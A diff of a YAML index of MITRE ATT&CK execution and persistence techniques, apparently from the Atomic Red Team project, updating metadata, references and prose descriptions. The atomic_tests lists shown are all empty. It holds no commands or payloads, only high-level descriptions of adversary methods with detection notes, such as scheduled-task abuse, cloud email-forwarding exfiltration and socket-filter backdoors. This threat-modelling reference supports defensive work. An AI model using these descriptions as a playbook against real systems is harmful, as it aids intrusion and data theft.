+        Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (<code>.lua</code>), or from Lua-embedded programs (through the <code>struct lua_State</code>).(Citation: Lua main page)(Citation: Lua state)
+
+        Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Script: Script Execution'
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+      created: '2024-08-05T18:19:42.201Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/011
+        external_id: T1059.011
+      - source_name: Kaspersky Lua
+        description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+          APT. Retrieved August 5, 2024.
+        url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+      - source_name: Lua main page
+        description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+        url: https://www.lua.org/start.html
+      - source_name: Lua state
+        description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+        url: https://pgl.yoyo.org/luai/i/lua_State
+      - source_name: Cyphort EvilBunny
+        description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+          Instrumented By Lua. Retrieved August 5, 2024.'
+        url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+      - source_name: PoetRat Lua
+        description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+          public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+        url: https://blog.talosintelligence.com/poetrat-update/
+      - source_name: Lua Proofpoint Sunseed
+        description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+          Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+          Malware to Target European Governments and Refugee Movement. Retrieved August
+          5, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1204.003:
     technique:
       x_mitre_platforms:
@@ -26226,7 +26605,7 @@ execution:
         url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
         description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
           Supply Chain and Infrastructure. Retrieved August 26, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-26T16:42:35.318Z'
       name: 'User Execution: Malicious Image'
       description: |-
         Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
@@ -26253,30 +26632,12 @@ execution:
       - 'Instance: Instance Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1204.003
     atomic_tests: []
   T1203:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
-      created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1203
-        url: https://attack.mitre.org/techniques/T1203
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:34:23.908Z'
+      name: Exploitation for Client Execution
       description: |-
         Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
 
@@ -26293,9 +26654,10 @@ execution:
         ### Common Third-party Applications
 
         Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Exploitation for Client Execution
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Detecting software exploitation may be difficult depending
         on the tools available. Also look for behavior on the endpoint system that
         might indicate successful compromise, such as abnormal behavior of the browser
@@ -26303,21 +26665,37 @@ execution:
         evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
         for attempts to hide execution, evidence of Discovery, or other unusual network
         traffic that may indicate additional tools transferred to the system.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: execution
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
+      - 'File: File Modification'
       - 'Application Log: Application Log Content'
+      - 'Network Traffic: Network Traffic Flow'
+      x_mitre_remote_support: false
       x_mitre_system_requirements:
       - Remote exploitation for execution requires a remotely accessible service reachable
         over the network or other vector of access such as spearphishing or drive-by
         compromise.
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+      created: '2018-04-18T17:59:24.739Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1203
+        external_id: T1203
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.006:
     technique:
@@ -26367,28 +26745,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.006
     atomic_tests: []
   T1569:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
-      type: attack-pattern
-      created: '2020-03-10T18:23:06.482Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569
-        url: https://attack.mitre.org/techniques/T1569
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-20T19:55:40.527Z'
       name: System Services
       description: Adversaries may abuse system services or daemons to execute commands
         or programs. Adversaries can execute malicious content by interacting with
@@ -26399,32 +26760,44 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for command line invocations of tools capable of
         modifying services that doesn’t correspond to normal usage patterns and known
         software, patch cycles, etc. Also monitor for changes to executables and other
         files associated with services. Changes to Windows services may also be reflected
         in the Registry.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
       - 'Service: Service Creation'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      - root
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+      created: '2020-03-10T18:23:06.482Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569
+        external_id: T1569
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1059.003:
     technique:
-      modified: '2024-03-01T17:35:02.889Z'
+      modified: '2024-10-15T15:19:56.540Z'
       name: 'Command and Scripting Interpreter: Windows Command Shell'
       description: |-
         Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -26467,12 +26840,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.003
     atomic_tests: []
   T1651:
     technique:
-      modified: '2024-04-12T03:27:48.171Z'
+      modified: '2024-10-15T13:42:42.543Z'
       name: Cloud Administration Command
       description: |-
         Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -26529,11 +26901,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:43:27.104Z'
       name: 'Command and Scripting Interpreter: Visual Basic'
       description: |-
         Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -26598,14 +26969,13 @@ execution:
         url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.005
     atomic_tests: []
   T1648:
     technique:
-      modified: '2024-03-05T16:13:38.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Serverless Execution
       description: "Adversaries may abuse serverless computing, integration, and automation
         services to execute arbitrary code in cloud environments. Many cloud providers
@@ -26626,14 +26996,19 @@ execution:
         an adversary may create a Lambda function that automatically adds [Additional
         Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
         and a corresponding CloudWatch events rule that invokes that function whenever
-        a new user is created.(Citation: Backdooring an AWS account) Similarly, an
-        adversary may create a Power Automate workflow in Office 365 environments
-        that forwards all emails a user receives or creates anonymous sharing links
-        whenever a user is granted access to a document in SharePoint.(Citation: Varonis
-        Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+        a new user is created.(Citation: Backdooring an AWS account) This is also
+        possible in many cloud-based office application suites. For example, in Microsoft
+        365 environments, an adversary may create a Power Automate workflow that forwards
+        all emails a user receives or creates anonymous sharing links whenever a user
+        is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+        Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+        environments, they may instead create an Apps Script that exfiltrates a user's
+        data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+        OWN-CERT Google App Script 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
       - Praetorian
@@ -26642,16 +27017,18 @@ execution:
       - Varonis Threat Labs
       - Alex Soler, AttackIQ
       - Vectra AI
+      - OWN
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'Application Log: Application Log Content'
@@ -26677,6 +27054,14 @@ execution:
         description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
           Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
         url: https://www.varonis.com/blog/power-automate-data-exfiltration
+      - source_name: Cloud Hack Tricks GWS Apps Script
+        description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+          2024.
+        url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+      - source_name: OWN-CERT Google App Script 2024
+        description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+          analysis. Retrieved October 2, 2024.
+        url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
       - source_name: Cado Security Denonia
         description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
           Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -26691,29 +27076,10 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
-      type: attack-pattern
-      created: '2020-03-11T14:43:31.706Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1204.001
-        url: https://attack.mitre.org/techniques/T1204/001
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-10T16:40:03.786Z'
       name: Malicious Link
       description: An adversary may rely upon a user clicking a malicious link in
         order to gain execution. Users may be subjected to social engineering to get
@@ -26726,25 +27092,41 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
 
         Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+      created: '2020-03-11T14:43:31.706Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1204/001
+        external_id: T1204.001
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1569.002:
     technique:
-      modified: '2023-08-14T15:53:00.999Z'
+      modified: '2024-10-15T16:41:40.247Z'
       name: 'System Services: Service Execution'
       description: |-
         Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).
@@ -26794,17 +27176,16 @@ execution:
         url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1569.002
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -26867,7 +27248,7 @@ execution:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -26901,8 +27282,8 @@ execution:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -26911,6 +27292,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -26923,29 +27308,29 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
 persistence:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -26992,7 +27377,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -27024,8 +27409,8 @@ persistence:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -27039,6 +27424,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -27051,16 +27440,19 @@ persistence:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -27123,7 +27515,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037:
     technique:
@@ -27188,49 +27579,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
